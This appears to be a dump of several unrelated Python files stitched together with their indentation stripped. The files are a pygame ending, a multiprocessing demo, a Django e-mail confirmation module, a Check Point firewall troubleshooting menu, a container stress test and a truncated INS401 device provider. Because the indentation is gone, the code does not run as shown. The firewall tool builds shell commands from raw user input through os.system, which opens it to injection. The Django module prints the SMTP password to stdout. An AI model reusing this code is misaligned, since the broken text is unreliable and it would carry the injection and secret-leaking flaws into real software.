else:
show_message(screen, "Game Over - Score: {} | saving...".format(score))
data_store.stop()
data_store_thread.join()
show_message(screen, "Game Over - Score: {} | saved.".format(score))
logger.info("Game over, data saved.")
pygame.event.clear()
while 1:
for event in pygame.event.get():
if event.type == pygame.QUIT or \
pygame.key.get_pressed()[K_KP_ENTER]:
return
if hasattr(event, "key"):
if event.key == 13:
return
if event.key == 113:
sys.exit()
def main(**kwargs) -> None:
while True:
play(**kwargs)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--name", default="default")
parser.add_argument("-m", "--model", default=None)
args = parser.parse_args()
main(name=args.name, model_file=args.model)
|
process_demo.py | from multiprocessing import Process
import os
def factorial(n):
if n == 0 or n == 1:
return 1
else:
return n * factorial(n-1)
def info(title):
print(title)
print('module name:', __name__)
print('parent process:', os.getppid())
print('process id:', os.getpid())
def f(name):
info('function f')
print('hello', name)
#print(factorial(n))
if __name__ == '__main__':
info('main line')
p = Process(target=f, args=('bob',))
p.start()
p.join() |
Confirm.py | from binascii import Error as b64Error
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from base64 import urlsafe_b64decode, urlsafe_b64encode
from smtplib import SMTP
from threading import Thread
from django.conf import settings
from django.template.loader import render_to_string
from django.urls import get_resolver
from django.contrib.auth import get_user_model, login, logout
from django.contrib.auth.tokens import default_token_generator
from django.utils import timezone
from .errors import InvalidUserModel, EmailTemplateNotFound, NotAllFieldCompiled
def sendConfirm(user, **kwargs):
active_field = validateAndGetField('EMAIL_ACTIVE_FIELD')
try:
setattr(user, active_field, False)
user.save()
try:
token = kwargs['token']
except KeyError:
token = default_token_generator.make_token(user)
email = urlsafe_b64encode(str(user.email).encode('utf-8'))
t = Thread(target=sendConfirm_thread, args=(user.email, f'{email.decode("utf-8")}/{token}'))
t.start()
except AttributeError:
raise InvalidUserModel('The user model you provided is invalid')
def sendConfirm_thread(email, token):
sender = validateAndGetField('EMAIL_SERVER')
domain = validateAndGetField('EMAIL_PAGE_DOMAIN')
subject = validateAndGetField('EMAIL_MAIL_SUBJECT')
address = validateAndGetField('EMAIL_ADDRESS')
port = validateAndGetField('EMAIL_PORT', default_type=int)
password = validateAndGetField('EMAIL_PASSWORD')
mail_plain = validateAndGetField('EMAIL_MAIL_PLAIN', raise_error=False)
mail_html = validateAndGetField('EMAIL_MAIL_HTML', raise_error=False)
if not (mail_plain or mail_html): # Validation for mail_plain and mail_html as both of them have raise_error=False
raise NotAllFieldCompiled(f"Both EMAIL_MAIL_PLAIN and EMAIL_MAIL_HTML missing from settings.py, at least one of them is required.")
domain += '/' if not domain.endswith('/') else ''
msg = MIMEMultipart('alternative')
msg['Subject'] = subject
msg['From'] = sender
msg['To'] = email
from .views import verify
link = ''
for k, v in get_resolver(None).reverse_dict.items():
if k is verify and v[0][0][1][0]:
addr = str(v[0][0][0])
link = domain + addr[0: addr.index('%')] + token
if mail_plain:
try:
text = render_to_string(mail_plain, {'link': link})
part1 = MIMEText(text, 'plain')
msg.attach(part1)
except AttributeError:
pass
if mail_html:
try:
html = render_to_string(mail_html, {'link': link})
part2 = MIMEText(html, 'html')
msg.attach(part2)
except AttributeError:
pass
if not msg.get_payload():
raise EmailTemplateNotFound('No email template found')
server = SMTP(sender, port)
server.starttls()
server.login(address, password)
server.sendmail(address, email, msg.as_string())
server.quit()
def validateAndGetField(field, raise_error=True, default_type=str):
try:
d = getattr(settings, field)
print(field, d)
if d == "" or d is None or not isinstance(d, default_type):
raise AttributeError
return d
except AttributeError:
if raise_error:
raise NotAllFieldCompiled(f"Field {field} missing or invalid")
return None
def verifyToken(email, email_token):
try:
users = get_user_model().objects.filter(email=urlsafe_b64decode(email).decode("utf-8"))
for user in users:
valid = default_token_generator.check_token(user, email_token)
if valid:
active_field = validateAndGetField('EMAIL_ACTIVE_FIELD')
setattr(user, active_field, True)
user.last_login = timezone.now()
user.save()
return valid
except b64Error:
pass
return False
|
troubleshooting.py | #
# Copyright 2020 by 0x7c2, Simon Brecht.
# All rights reserved.
# This file is part of the Report/Analytic Tool - CPme,
# and is released under the "Apache License 2.0". Please see the LICENSE
# file that should have been included as part of this package.
#
from subprocess import Popen, PIPE, STDOUT
import logme
import os
import func
import sys
import time
import datetime
import signal
import threading
menu_text = "Troubleshooting Options"
menu_item = [ ["Run fw monitor with filter", "troubleshooting.fwmonitor()"],
["Run tcpdump with filter", "troubleshooting.tcpdump()"],
["Run tcpdump, capture fragmented packets","troubleshooting.tcpdump('-i any \"(ip[6:2] & 0x1fff) != 0\" -nn')"],
["Run zdebug with options", "troubleshooting.zdebug()"],
["Print connection table - raw", "troubleshooting.print_table('connections')"],
["Print connection table - formatted", "troubleshooting.print_table('connections', True)"],
["Clear connection table (ALL!)", "troubleshooting.clear_table('connections')"],
["Clear specific connections from table","troubleshooting.clear_table_input('connections')"],
["STOP CheckPoint Services", "troubleshooting.run_cpstop()"],
["STOP CheckPoint Services and keep policy","troubleshooting.run_cpstop('-fwflag -proc')"],
["UNLOAD Security/TP Policy", "troubleshooting.load_policy(False)"],
["FETCH Security/TP Policy", "troubleshooting.load_policy(True)"],
["Disable Antispoofing", "troubleshooting.run_spoofing(0)"],
["Enable Antispoofing", "troubleshooting.run_spoofing(1)"],
["ClusterXL Status", "troubleshooting.clusterxl_status()"],
["SecureXL DoS Mitigation Status", "troubleshooting.run_securexl_dos()"],
["Display VPN Tunnel Status", "troubleshooting.print_vpn()"]]
if func.isFirewall() and not func.isFWUserMode():
menu_item.append(["TOP 15 heavy F2F Connections (specific worker)", "troubleshooting.select_f2f_stats()"])
menu_item.append(["TOP 15 heavy F2F Connections (all worker!)", "troubleshooting.print_f2f_stats(-1)"])
if func.isFirewall() and func.isFWUserMode():
menu_item.append(["Display user-mode cpu ressources", "troubleshooting.run_top('-H -p `pidof fwk`')"])
if func.isFirewall():
menu_item.append(["Measure kernel delay (EXPERIMENTAL!)", "troubleshooting.fwkern_delay()"])
menu_item.append(["Disable IPS on the fly", "troubleshooting.run_ips(False)"])
menu_item.append(["Enable IPS on the fly", "troubleshooting.run_ips(True)"])
menu_item.append(["Print heavy conns detected by CoreXL", "troubleshooting.print_heavy_conn()"])
menu_item.append(["Back to Main Menu", "menu_set('main')"])
def get_results(clear = False):
global results
res = results
if clear:
results = []
return res
def add_text():
return menu_text
def add_item():
return menu_item
def print_results():
global results
logme.results(results)
results = []
connections = {}
match_forward = 0
match_reverse = 0
stopme = False
local_ips = []
def fwkern_get_ifaces():
global local_ips
ipaddr = []
out, err = func.execute_command("ifconfig | grep 'inet addr'")
for line in out:
tmp = line.replace('inet addr:','').split()
ipaddr.append(tmp[0])
local_ips = ipaddr
def fwkern_check_inbound(iface):
tmp = iface.split(":")
tmp = tmp[1].split("[")[0]
if "i" == str(tmp):
return True
else:
return False
def fwkern_calc_delay(time1, time2):
t1 = datetime.datetime.strptime(time1, '%H:%M:%S.%f')
t2 = datetime.datetime.strptime(time2, '%H:%M:%S.%f')
delay = str(t2 - t1)[6:]
return delay
def fwkern_parse(one, two):
global connections
global match_forward
global match_reverse
global local_ips
l1 = one.split()
l2 = two.split()
worker = l1[0]
date = l1[1]
time = l1[2]
interface = l1[3]
src = l1[4]
dst = l1[6]
len = l1[8].replace("len=", "")
id = l1[9]
src_port = l2[1]
dst_port = l2[3]
tuple = (src, src_port, dst, dst_port)
tuple_r = (dst, dst_port, src, src_port)
# filter out connection from or to gateway
if src in local_ips or dst in local_ips:
return
# check forward connection mapping
if tuple in connections:
if fwkern_check_inbound(interface):
connections[tuple]["in"] = time
else:
connections[tuple]["out"] = time
connections[tuple]["delay"] = fwkern_calc_delay(connections[tuple]["in"], connections[tuple]["out"])
connections[tuple]["bytes"] = str(int(connections[tuple]["bytes"]) + int(len))
match_forward = match_forward + 1
return
# check reverse connection mapping
if tuple_r in connections:
if fwkern_check_inbound(interface):
connections[tuple_r]["in"] = time
else:
connections[tuple_r]["out"] = time
connections[tuple_r]["delay"] = fwkern_calc_delay(connections[tuple_r]["in"], connections[tuple_r]["out"])
connections[tuple_r]["bytes"] = str(int(connections[tuple_r]["bytes"]) + int(len))
match_reverse = match_reverse + 1
return
connections[tuple] = {"worker": worker, "time": time, "interface": interface, "id": id, "len": len, "in": time, "out": "-1", "delay": "-1", "bytes": "0"}
def fwkern_start():
global stopme
stopme = False
fwkern_get_ifaces()
cmd = "fw monitor -T -m iO"
p = Popen(cmd, stdout=PIPE, stderr=STDOUT, shell=True, bufsize=1, universal_newlines=True)
for line in iter(p.stdout.readline, b''):
if stopme: return
tmp = line.strip('\n')
# exclude other protocols than tcp or udp
if "(TCP)" in tmp or "(UDP)" in tmp:
# matched first line of output
line_first = tmp
if "TCP:" in tmp or "UDP:" in tmp:
# matched second line
line_second = tmp
fwkern_parse(line_first, line_second)
p.stdout.close()
p.wait()
stopme = True
def fwkern_output():
global connections
global stopme
global match_forward
global match_reverse
max = 25
CURSOR_UP_ONE = '\x1b[1A'
ERASE_LINE = '\x1b[2K'
printed = False
print("** Starting Kernel Debug! Just wait a second...")
print("** Press CTRL+C to exit.")
print("")
time.sleep(10)
try:
while(True):
if printed:
for i in range(1, count + 5):
sys.stdout.write(CURSOR_UP_ONE)
sys.stdout.write(ERASE_LINE)
count = 0
if stopme: break
output = "* Last Update: " + str(datetime.datetime.now())
output = output + "\n" + "* Seen connections count: " + str(len(connections))
output = output + "\n" + "* Matching Tuples; Forward=" + str(match_forward) + " , Reverse=" + str(match_reverse) + "\n\n"
for key, val in reversed(sorted(connections.items(), key=lambda item: item[1]["delay"])):
if val["delay"] != "-1":
if count > max: break
if stopme: break
delay = str(val["delay"])
bytes = str(val["bytes"])
mylen = 55
mylen = mylen - len(str(key))
output = output + (str(key) + mylen*" " + ", Delay: " + str(delay) + " seconds, bytes: " + str(bytes)) + "\n"
count = count + 1
sys.stdout.write(output)
sys.stdout.flush()
printed = True
time.sleep(1)
except KeyboardInterrupt:
pass
print("** Stopping Kernel Debug! Just wait a second...")
stopme = True
def fwkern_delay():
global stopme
t1 = threading.Thread(target=fwkern_start)
t1.start()
fwkern_output()
stopme = True
t1.join()
os.system("fw monitor -U")
print("** Done!")
def ip2hex(ipaddr):
if ipaddr != "":
a = ipaddr.split('.')
b = hex(int(a[0]))[2:].zfill(2) + hex(int(a[1]))[2:].zfill(2) + hex(int(a[2]))[2:].zfill(2) + hex(int(a[3]))[2:].zfill(2)
b = b.replace('0x', '')
b = b.lower()
return b
else:
return "ffffffff".lower()
def run_ips(ena):
print("")
if ena:
cmd = "ips on"
else:
cmd = "ips off -n"
func.confirm(cmd)
print("")
def run_securexl_dos():
print("")
cmd = "fwaccel dos config get ; fwaccel dos stats get"
print("Executing command:")
print(cmd)
os.system(cmd)
print("")
def run_spoofing(val):
print("")
print("Modify kernel parameters for spoofing:")
cmd = "fw ctl set int fw_antispoofing_enabled " + str(val)
func.confirm(cmd)
cmd = "fw ctl set int fw_local_interface_anti_spoofing " + str(val)
func.confirm(cmd)
print("")
def run_cpstop(parms = ""):
print("")
print("Stopping CheckPoint Services...")
cmd = "cpstop " + parms
func.confirm(cmd)
print("")
def print_heavy_conn():
print("")
print("Printing heavy connections:")
print("fw ctl multik print_heavy_conn")
print(" ")
os.system("fw ctl multik print_heavy_conn")
print("")
def run_top(filter = ""):
print("")
print("Running top command:")
cmd = "top " + filter
print(cmd)
print("")
os.system(cmd)
print("")
def zdebug():
print("")
print("Defaults listed in brackets, just press return")
print("to accept. Press STRG+C to stop debug!")
print("")
buf = input("Enter buffer [1024]: ")
if buf != "":
buf = "-buf " + buf + " "
mod = input("Enter module [fw] : ")
if mod != "":
mod = "-m " + mod
opt = input("Enter options [drop]: ")
if opt == "":
opt = "drop"
print("")
fil = input("Enter grep filter []: ")
if fil != "":
fil = " grep -i '"+fil+"'"
cmd = "fw ctl zdebug " + buf + mod + " + " + opt + fil
print("")
print("Executing command:")
print(cmd)
print("")
os.system(cmd)
print("")
print("Resetting kernel filter...")
cmd = "fw ctl debug 0"
print(cmd)
os.system(cmd)
print("")
def load_policy(ena):
print("")
if ena:
s = input("Enter Security Management Server IP: ")
cmd = "fw fetch " + s
print("")
func.confirm(cmd)
print("")
cmd = "fw amw fetch " + s
func.confirm(cmd)
else:
cmd = "fw unloadlocal"
func.confirm(cmd)
print("")
cmd = "fw amw unload"
func.confirm(cmd)
def fwmonitor():
print("Example(s) for filter string:")
print("host(1.1.1.1)")
print("net(192.168.0.0,24)")
print("icmp")
print("")
s = input("Enter filter string: ")
print("")
print("Executing command:")
cmd = 'fw monitor -e "accept ' + s + ';"'
print(cmd)
print("")
os.system(cmd)
def tcpdump(filter = ""):
if filter == "":
print("Example(s) for interface:")
print("eth1")
print("eth6.101")
print("")
print("Example(s) for filter string:")
print("host 1.1.1.1")
print("icmp")
print("")
int = input("Enter interface : ")
fil = input("Enter filter string: ")
print("")
cmd = "tcpdump -i " + int + " -s0 -nnnnn -vvvvvv " + fil
else:
cmd = "tcpdump " + filter
print("Executing command:")
print(cmd)
print("")
os.system(cmd)
def print_vpn():
vpn_table_tab = "local_meta_sas"
vpn_table = []
vpn_links = {}
logme.loader()
out, err = func.execute_command("fw tab -t " + vpn_table_tab + " -u | awk 'NR>3 { print $0 }' | grep -v '\->'")
for line in out:
logme.loader()
tmp = line.strip("\n").strip("<").strip(">")
tmp = tmp.split(",")
if len(tmp) > 10:
vpn_table.append(tmp)
out, err = func.execute_command("fw tab -t resolved_link -u | awk 'NR>3 { print $0 }'")
for line in out:
logme.loader()
tmp = line.strip("\n").strip("<").strip(">")
remote_id = tmp.split(';')[0]
data = tmp.split(',')
if not remote_id in vpn_links and len(data) > 10:
vpn_links[remote_id] = data[1].strip(' ')
print(" %-8s %17s %17s %20s %20s" % ("ID", "Remote IP", "Resolved Link", "Local Subnet", "Remote Subnet"))
print(" " + 86*"=")
for e in vpn_table:
tunnel_id = e[10].strip(' ')
remote_ip = func.hex2ip(e[0])
if e[0] in vpn_links:
remote_link = func.hex2ip(vpn_links[e[0]])
else:
remote_link = "0.0.0.0"
local_subnet = func.calc_subnet(func.hex2ip(e[1]), func.hex2ip(e[2]))
remote_subnet = func.calc_subnet(func.hex2ip(e[3]), func.hex2ip(e[4]))
print(" %-8s %17s %17s %20s %20s" % (tunnel_id, remote_ip, remote_link, local_subnet, remote_subnet))
def print_table(fwtab, formatted = False):
print("")
cmd = "fw tab -t " + fwtab + " -u"
if formatted:
cmd = cmd + " -f"
print("Executing command:")
print(cmd)
print("")
os.system(cmd)
print("")
def clear_table_input(fwtab):
print("Please enter common ip addresses. If you wish to disable filter, just")
print("leave those fields empty.")
print("")
ip_src = input("Enter source ip : ")
ip_dst = input("Enter destination ip: ")
print("")
if ip_src != "":
iphex_src = ip2hex(ip_src)
print("Filter: source = " + ip_src + " (" + iphex_src + ")")
else:
iphex_src = ""
if ip_dst != "":
iphex_dst = ip2hex(ip_dst)
print("Filter: destination = " + ip_dst + " (" + iphex_dst + ")")
else:
iphex_dst = ""
clear_table(fwtab, iphex_src, iphex_dst)
def clear_table(fwtab, iphex_src = "", iphex_dst = ""):
a = input("Should i really CLEAR table? [y/N] ")
if a.lower() != "y":
print("Aborting !")
return False
out, err = func.execute_command("fw tab -t " + fwtab + " -u | awk 'NR>3 {print $1$2$3$4$5$6}' | sed 's/<//g' | sed 's/>//g' | sed 's/;//g'")
for line in out:
delete = False
conn = line.strip('\n')
fields = conn.split(',')
if len(fields) < 5:
continue
if iphex_src != "":
if iphex_src == fields[1]:
delete = True
if iphex_dst != "":
if iphex_dst == fields[3]:
delete = True
if iphex_src == "" and iphex_dst == "":
delete = True
if delete:
print("-> Deleting Connection: " + conn)
os.system("fw tab -t " + fwtab + " -x -e " + conn + " >/dev/null 2>&1")
def clusterxl_status():
cmd = "cphaprob state ; cphaprob -a if"
print("")
print("Executing:")
print(cmd)
print("")
os.system(cmd)
def change_f2f_stats(worker_id, val):
os.system("echo " + str(val) + " > /proc/cpkstats/fw_worker_" + str(worker_id) + "_stats")
def getall_f2f_worker():
workers = []
for filename in os.listdir("/proc/cpkstats/"):
if "fw_worker_" in filename and "_stats" in filename and not "raw" in filename:
workers.append(int(filename.replace("fw_worker_","").replace("_stats","")))
return workers
def select_f2f_stats():
print("")
all = getall_f2f_worker()
w = input("Enter fw_worker id for statistics: ")
print("")
error = False
try:
w_i = int(w)
if not w_i in all:
error = True
except:
error = True
if error:
print("fw_worker id is invalid !")
print("valid ids are:")
print(all)
return
print_f2f_stats(w_i)
def print_f2f_stats(worker_id):
# enabling worker debug for f2f
if worker_id < 0:
# print all workers
workers = getall_f2f_worker()
for worker in workers:
print("Enabling Debug on fw_worker[" + str(worker) + "] ...")
change_f2f_stats(worker, 1)
else:
print("Single fw_worker[" + str(worker_id) + "] selected...")
change_f2f_stats(worker_id, 1)
workers = []
workers.append(worker_id)
output = ""
stats = []
stats_sort = []
CURSOR_UP_ONE = '\x1b[1A'
ERASE_LINE = '\x1b[2K'
print(" ")
print("Entering Loop, press CTRL+C to exit.")
print("Refreshing statistics every second..")
print(" ")
print(" ")
# Field begins:
# 2 12 20 35 49
print(" Worker Type Cycles Time ago Data")
print(" ============================================================================================================")
try:
while True:
for n in stats_sort:
sys.stdout.write(CURSOR_UP_ONE)
sys.stdout.write(ERASE_LINE)
output = ""
stats.clear()
for worker in workers:
for line in func.tail_and_head('/proc/cpkstats/fw_worker_' + str(worker) + '_stats', 18, 16):
raw = str(line).replace('\t','').replace('\n','')
raw = raw.split()
s_worker = worker
s_type = raw[0].replace(':','')
s_cycles = int(raw[1])
s_timeago = int(raw[2])
raw = raw[3:]
s_data = ' '.join(raw)
new = { 'worker': s_worker, 'type': s_type, 'cycles': s_cycles, 'timeago': s_timeago, 'data': s_data }
stats.append(new)
stats_sort = sorted(stats, key=lambda k: k['cycles'], reverse=True)
stats_sort = stats_sort[:15]
for s in stats_sort:
output += " " + func.str_pad(s["worker"], 2) + 10*" " + s["type"] + 5*" " + func.str_pad(s["cycles"], 10, padLeft = True) + 6*" " + func.str_pad(s["timeago"], 3, padLeft = True) + 12*" " + s["data"] + "\n"
sys.stdout.write(output)
sys.stdout.flush()
time.sleep(1)
except KeyboardInterrupt:
pass
print(" ")
print(" ")
# disabling worker debug for f2f
for worker in workers:
print("Disabling Debug on fw_worker[" + str(worker) + "] ...")
change_f2f_stats(worker, 0)
|
stress.py | from multiprocessing import Queue, Process
#from Queue import Queue
#from threading import Thread as Process
from cattle import from_env
import time
URL = 'http://mgmt1:8080/v1/schemas'
queue = Queue()
client = from_env(url=URL)
start = time.time()
def progress():
done_count = 0
error_count = 0
while True:
id = queue.get()
if id is None:
break
c = client.by_id_container(id)
c = client.wait_transitioning(c, timeout=10000)
if c.state == 'running':
print (c.firstRunningTS - c.createdTS)/1000, c.id, c.hosts()[0].name
done_count += 1
else:
error_count += 1
print time.time(), 'Done:', done_count, 'Error:',\
error_count, 'Queue:', queue.qsize()
print 'Total', (time.time() - start)
def run(count=50000, batch=1, interval=1.000):
client = from_env(url=URL)
unmanaged_network = client.list_network(uuid='unmanaged')[0]
#network = client.list_network(uuid='managed-docker0')[0]
remaining = count
while remaining > 0:
start = time.time()
current_batch = min(batch, remaining)
try:
cs = client.create_container(imageUuid='docker:ibuildthecloud/helloworld',
count=current_batch,
networkIds=[unmanaged_network.id],
#networkIds=[network.id],
instanceTriggeredStop='restart',
command='sleep 1000000')
if cs.type == 'collection':
for c in cs:
print 'Created', remaining, c.id, c.uuid
queue.put(c.id)
else:
print 'Created', remaining, cs.id, cs.uuid
queue.put(cs.id)
except Exception, e:
print e
remaining -= current_batch
wait = interval - (time.time() - start)
if wait > 0:
print 'Sleep', wait
time.sleep(wait)
else:
print 'Fall behind', wait
queue.put(None)
Process(target=progress).start()
Process(target=run).start()
|
ethernet_provider.py | import os
import struct
import time
import json
import datetime
import threading
import math
import re
import struct
from ..widgets import (NTRIPClient, EthernetDataLogger,
EthernetDebugDataLogger, EthernetRTCMDataLogger)
from ...framework.utils import (helper, resource)
from ...framework.context import APP_CONTEXT
from ...framework.utils.firmware_parser import parser as firmware_content_parser
from ..base.provider_base import OpenDeviceBase
from ..configs.ins401_predefine import (APP_STR, get_ins401_products,
get_configuratin_file_mapping)
from ..decorator import with_device_message
from ...models import InternalCombineAppParseRule
from ..parsers.ins401_field_parser import encode_value
from ...framework.utils.print import (print_yellow, print_green, print_blue)
from ..ins401.mountangle.mountangle import MountAngle
from ..upgrade_workers import (
EthernetSDK9100UpgradeWorker,
FirmwareUpgradeWorker,
JumpBootloaderWorker,
JumpApplicationWorker,
UPGRADE_EVENT,
UPGRADE_GROUP
)
GNZDA_DATA_LEN = 39
class Provider(OpenDeviceBase):
'''
INS401 Ethernet 100base-t1 provider
'''
def __init__(self, communicator, *args):
super(Provider, self).__init__(communicator)
self.type = 'INS401'
self.server_update_rate = 100
self.sky_data = []
self.pS_data = []
self.app_config_folder = ''
self.device_info = None
self.app_info = None
self.compile_info = None
self.parameters = None
self.setting_folder_path = None
self.data_folder = None
self.debug_serial_port = None
self.rtcm_serial_port = None
self.user_logf = None
self.debug_logf = None
self.rtcm_logf = None
self.debug_c_f = None
self.enable_data_log = False
self.is_app_matched = False
self.ntrip_client_enable = False
self.nmea_buffer = []
self.nmea_sync = 0
self.prepare_folders()
self.ntrip_client = None
self.connected = True
self.rtk_log_file_name = ''
self.rtcm_rover_logf = None
self.big_mountangle_rvb = [0, 0, 0]
self.ins_save_logf = None
self.ins401_log_file_path = None
self.mountangle_thread = None
self.mountangle= None
self.f_process = None
def prepare_folders(self):
'''
Prepare folders for data storage and configuration
'''
executor_path = resource.get_executor_path()
setting_folder_name = 'setting'
data_folder_path = os.path.join(executor_path, 'data')
if not os.path.isdir(data_folder_path):
os.makedirs(data_folder_path)
self.data_folder = data_folder_path
# copy contents of app_config under executor path
self.setting_folder_path = os.path.join(executor_path,
setting_folder_name)
all_products = get_ins401_products()
config_file_mapping = get_configuratin_file_mapping()
for product in all_products:
product_folder = os.path.join(self.setting_folder_path, product)
if not os.path.isdir(product_folder):
os.makedirs(product_folder)
for app_name in all_products[product]:
app_name_path = os.path.join(product_folder, app_name)
app_name_config_path = os.path.join(
app_name_path, config_file_mapping[product])
if not os.path.isfile(app_name_config_path):
if not os.path.isdir(app_name_path):
os.makedirs(app_name_path)
app_config_content = resource.get_content_from_bundle(
setting_folder_name,
os.path.join(product, app_name,
config_file_mapping[product]))
if app_config_content is None:
continue
with open(app_name_config_path, "wb") as code:
code.write(app_config_content)
@property
def is_in_bootloader(self):
''' Check if the connected device is in bootloader mode
'''
if not self.app_info or not self.app_info.__contains__('version'):
return False
version = self.app_info['version']
version_splits = version.split(',')
if len(version_splits) == 1:
if 'bootloader' in version_splits[0].lower():
return True
return False
def bind_device_info(self, device_access, device_info, app_info):
self._build_device_info(device_info)
self._build_app_info(app_info)
self.connected = True
self._device_info_string = '# Connected {0} with ethernet #\n\rDevice: {1} \n\rFirmware: {2}'\
.format('INS401', device_info, app_info)
return self._device_info_string
def bind_compile_info(self, compile_info):
compile_info_str = str(compile_info, encoding='utf-8')
compile_info_str = compile_info_str.replace('\x0b','\\')
self._build_compile_info(compile_info_str)
return (compile_info_str)
def _build_compile_info(self, text):
'''
Build compile info
'''
split_text = text.split(',')
self.compile_info = {
'ins_lib':{
'version': split_text[0],
'time': split_text[1],
'author': split_text[2],
'commit':split_text[3]
},
'ins_app':{
'version': split_text[4],
'time': split_text[5],
'author': split_text[6],
'commit':split_text[7]
},
'rtk_lib':{
'version': split_text[8],
'time': split_text[9],
'author': split_text[10],
'commit':split_text[11]
},
'rtk_app':{
'version': split_text[12],
'time': split_text[13],
'author': split_text[14],
'commit':split_text[15]
}
}
print(self.compile_info)
def _build_device_info(self, text):
'''
Build device info
'''
if text.__contains__('SN:'):
split_text = text.split(' ')
sn_split_text = text.split('SN:')
self.device_info = {
'name': split_text[0],
'pn': split_text[2],
'sn': sn_split_text[1]
}
else:
split_text = text.split(' ')
self.device_info = {
'name': split_text[0],
'pn': split_text[1],
'sn': split_text[2],
'hardware':split_text[4]
}
def _build_app_info(self, text):
'''
Build app info
'''
if text.__contains__('SN:'):
self.app_info = {
'version': 'bootloader'
}
return
app_version = text
split_text = app_version.split(' ')
app_name = next((item for item in APP_STR if item in split_text), None)
if not app_name:
app_name = 'RTK_INS'
self.is_app_matched = False
else:
self.is_app_matched = True
self.app_info = {
'app_name': app_name,
'firmware': split_text[2],
'bootloader': split_text[4],
}
def load_properties(self):
# Load config from user working path
local_config_file_path = os.path.join(os.getcwd(), 'ins401.json')
if os.path.isfile(local_config_file_path):
with open(local_config_file_path) as json_data:
self.properties = json.load(json_data)
return
# Load the openimu.json based on its app
product_name = self.device_info['name']
app_name = 'RTK_INS' # self.app_info['app_name']
app_file_path = os.path.join(self.setting_folder_path, product_name,
app_name, 'ins401.json')
with open(app_file_path) as json_data:
self.properties = json.load(json_data)
if not self.is_app_matched:
print_yellow(
'Failed to extract app version information from unit.'
)
def ntrip_client_thread(self):
self.ntrip_client = NTRIPClient(self.properties)
self.ntrip_client.on('parsed', self.handle_rtcm_data_parsed)
if self.device_info.__contains__('sn') and self.device_info.__contains__('pn'):
self.ntrip_client.set_connect_headers({
'Ntrip-Sn': self.device_info['sn'],
'Ntrip-Pn': self.device_info['pn']
})
self.ntrip_client.run()
def handle_rtcm_data_parsed(self, data):
# print('rtcm',data)
if not self.is_upgrading and not self.with_upgrade_error:
if self.rtcm_logf is not None and data is not None:
self.rtcm_logf.write(bytes(data))
self.rtcm_logf.flush()
if self.communicator.can_write():
command = helper.build_ethernet_packet(
self.communicator.get_dst_mac(),
self.communicator.get_src_mac(), b'\x02\x0b', data)
self.communicator.write(command.actual_command)
def after_setup(self):
set_user_para = self.cli_options and self.cli_options.set_user_para
self.ntrip_client_enable = self.cli_options and self.cli_options.ntrip_client
# with_raw_log = self.cli_options and self.cli_options.with_raw_log
set_mount_angle = self.cli_options and self.cli_options.set_mount_angle
try:
if self.data_folder:
dir_time = time.strftime("%Y%m%d_%H%M%S", time.localtime())
file_time = time.strftime("%Y_%m_%d_%H_%M_%S",
time.localtime())
file_name = self.data_folder + '/' + 'ins401_log_' + dir_time
os.mkdir(file_name)
self.rtk_log_file_name = file_name
self.ins401_log_file_path = file_name + '/' + 'user_' + file_time + '.bin'
self.user_logf = open(self.ins401_log_file_path, "wb")
self.rtcm_logf = open(
file_name + '/' + 'rtcm_base_' + file_time + '.bin', "wb")
self.rtcm_rover_logf = open(
file_name + '/' + 'rtcm_rover_' + file_time + '.bin', "wb")
self.ins_save_logf = open(
file_name + '/' + 'ins_save_' + file_time + '.bin', "wb")
if set_user_para:
result = self.set_params(
self.properties["initial"]["userParameters"])
##print('set user para {0}'.format(result))
if result['packetType'] == 'success':
self.save_config()
# check saved result
self.check_predefined_result()
if set_mount_angle:
self.set_mount_angle()
self.prepare_lib_folder()
if not self.is_in_bootloader:
result = self.get_ins_message()
if result['packetType'] == 'success':
#print('data = ',bytes(result['data']))
self.ins_save_logf.write(bytes(result['raw_data']))
self.ins_save_logf.flush()
else:
print('can\'t get ins save message')
if self.cli_options.debug == 'true':
result = self.get_compile_message()
if result['packetType'] == 'success':
format_compile_info = self.bind_compile_info(
result['data'])
print_blue(format_compile_info)
else:
print('can\'t get get_compile_message')
self.save_device_info()
# start ntrip client
if not self.is_upgrading and not self.with_upgrade_error:
# start ntrip client
if self.properties["initial"].__contains__("ntrip") \
and not self.ntrip_client and not self.is_in_bootloader:
threading.Thread(target=self.ntrip_client_thread).start()
except Exception as e:
print('Exception in after setup', e)
return False
def nmea_checksum(self, data):
nmea_str = data[1:len(data) - 2]
nmeadata = nmea_str[0:len(nmea_str)-3]
cksum = nmea_str[len(nmea_str)-2:len(nmea_str)]
calc_cksum = 0
for s in nmeadata:
calc_cksum ^= ord(s)
return int(cksum, 16), calc_cksum
def on_read_raw(self, data):
if data[0] != 0x24 or data[1] != 0x47:
return
temp_str_nmea = data.decode('utf-8')
if (temp_str_nmea.find("\r\n", len(temp_str_nmea)-2, len(temp_str_nmea)) != -1):
str_nmea = temp_str_nmea
elif(temp_str_nmea.find("\r\n", GNZDA_DATA_LEN-2, GNZDA_DATA_LEN) != -1):
str_nmea = temp_str_nmea[0:GNZDA_DATA_LEN]
else:
return
try:
cksum, calc_cksum = self.nmea_checksum(str_nmea)
if cksum == calc_cksum:
if str_nmea.find("$GPGGA", 0, 6) != -1 or str_nmea.find("$GNGGA", 0, 6) != -1:
if self.ntrip_client:
self.ntrip_client.send(str_nmea)
if self.user_logf:
self.user_logf.write(data)
APP_CONTEXT.get_print_logger().info(str_nmea[0:len(str_nmea) - 2])
except Exception as e:
print('NMEA fault:{0}'.format(e))
pass
def thread_data_log(self, *args, **kwargs):
self.ethernet_data_logger = EthernetDataLogger(self.properties,
self.communicator,
self.user_logf)
self.ethernet_data_logger.run()
def thread_debug_data_log(self, *args, **kwargs):
self.ethernet_debug_data_logger = EthernetDebugDataLogger(
self.properties, self.communicator, self.debug_logf)
self.ethernet_debug_data_logger.run()
def thread_rtcm_data_log(self, *args, **kwargs):
self.ethernet_rtcm_data_logger = EthernetRTCMDataLogger(
self.properties, self.communicator, self.rtcm_logf)
self.ethernet_rtcm_data_logger.run()
def set_mountangle_config(self, result = []):
# copy contents of app_config under executor path
setting_folder_path = os.path.join(resource.get_executor_path(),
'setting')
# Load the openimu.json based on its app
product_name = 'INS401'
app_name = 'RTK_INS' # self.app_info['app_name']
app_file_path = os.path.join(setting_folder_path, product_name,
app_name, 'ins401.json')
with open(app_file_path, 'r') as json_data:
self.properties = json.load(json_data)
# update mountangle config file
with open(app_file_path, 'w') as json_data:
userParameters = self.properties["initial"]["userParameters"]
for i in range(3):
